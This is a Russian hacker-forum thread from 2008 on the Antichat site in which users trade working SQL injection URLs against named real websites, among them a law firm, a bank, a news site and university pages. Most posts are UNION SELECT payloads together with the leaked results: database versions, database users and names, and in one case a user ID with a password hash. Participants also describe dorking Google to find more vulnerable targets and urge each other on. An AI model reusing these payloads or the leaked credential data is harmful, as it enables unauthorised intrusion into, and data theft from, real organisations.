ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4841  
Старый 18.02.2008, 07:50
a1ex
Banned
Регистрация: 11.10.2006
Сообщений: 682
Провел на форуме:
3750406

Репутация: 271


Отправить сообщение для a1ex с помощью ICQ Отправить сообщение для a1ex с помощью AIM Отправить сообщение для a1ex с помощью MSN Отправить сообщение для a1ex с помощью Yahoo
По умолчанию

Цитата:
http://www.somachlaw.com/attorneys_bio.php?id=-13%2527+union+select+1,2,3,TABLE_NAME,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schem a.tables--
Кто нить знает как движок назывыается ?
Похош на самаписный имхо...
 
Ответить с цитированием

  #4842  
Старый 18.02.2008, 09:03
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
По умолчанию

не ето не самописный точно если в гугле вбить inurl:"attorneys_bio.php" то он выдаст линков 20 и почти у всех будет скуля
 
Ответить с цитированием

  #4843  
Старый 18.02.2008, 09:33
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

http://worldnetdaily.com/index.php?fa=PAGE.view&pageId=999999+union+select+ 1,2,concat(version(),0x3a,user(),0x3a,database()), 4,5,6,7/*
5.0.22-log:wndMysqlUser@pr-01:wndNew

http://worldnetdaily.com/index.php?fa=PAGE.view&pageId=999999+union+select+ 1,2,concat(userId,char(58),password),4,5,6,7+from+ user_users/*
1:530a14617895ab8725760a2a401162b4

lawnmower
==================================================
http://www.fireworkszone.com/index.php?root=39&extension=&idChapitre=47+union+s elect+1,2,3,4,5,6,7,8,9,10,11,12,concat(version(), 0x203a,user(),0x3a,database()),14,15,16,17,18,19,2 0/*
4.1.11-Debian_4online1-log
:fireworkszonecom@212.27.35.49:fireworkszonecom

ндя idchapitre= вот он враг

гуголь нашел еще 5 сайтов 4 оказались уязвимы... поищем еще

Последний раз редактировалось xcedz; 18.02.2008 в 13:27..
 
Ответить с цитированием

  #4844  
Старый 18.02.2008, 14:12
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.ufo.com.br/bonus.php?id=-8+union+select+1,2,version()+admin/*
Код:
http://www.menestrersgascons.com/francais/groupesmusicaux/bonus.php?id=-5+union+select+1,2,VERSION(),4,5,6,7,8,9/*
Код:
http://www.kujtesa.com/bs.php?id=-33+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14/*

Последний раз редактировалось SWAT; 18.02.2008 в 14:22..
 
Ответить с цитированием

  #4845  
Старый 18.02.2008, 14:30
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Код HTML:
http://fxibank.com/index.php?menu_id=0x3235+union+select+concat(version(),0x3a,user(),0x3a,database())/*

4.1.21 fxintegralbank@localhost:fxintegralbank дерзайте други

Последний раз редактировалось xcedz; 18.02.2008 в 14:37..
 
Ответить с цитированием

  #4846  
Старый 18.02.2008, 14:51
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

Mambo component Portfolio Manager 1.0

Код:
http://www.inta.org/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*
(c) it's my
 
Ответить с цитированием

  #4847  
Старый 18.02.2008, 16:05
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Код:
http://www.goadirondack.com/menu_page.php?menu_id=-1+union+select+1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6/*
4.0.16-max-nt:001402@localhost:001402
 
Ответить с цитированием

  #4848  
Старый 18.02.2008, 17:21
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

http://www.multim.org/index.php?section=cours_affiche_session&vchParam=1 '+union+select+1,concat(version(),0x3a,user(),0x3a ,database()),3,4,5,6,7,8,9/*
5.0.32-Debian_7etch5-log:multim_www@localhost:multim_www

Последний раз редактировалось xcedz; 18.02.2008 в 17:24..
 
Ответить с цитированием

  #4849  
Старый 18.02.2008, 17:45
x88x
Участник форума
Регистрация: 27.11.2007
Сообщений: 233
Провел на форуме:
1379382

Репутация: 378
Отправить сообщение для x88x с помощью ICQ
По умолчанию

вот парочка ЕДУшек с ПР=6 =)

_http://experts.uchicago.edu/experts.php?id=99999+union+select+1,2,3,4,VERSION( ),6,USER(),DATABASE(),9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42/*
вручную подбирал =)

_http://wandp.american.edu/pages.php?ID=99999+union+select+1,2,3,4/*
тут чет непонятное...
 
Ответить с цитированием

  #4850  
Старый 18.02.2008, 17:51
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
Post

http://www.thedietplate.us/products.php?cat=-99991%2527%2520+union+select+version()/* 4.1.22-standard
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
 


Быстрый переход




ANTICHAT.XYZ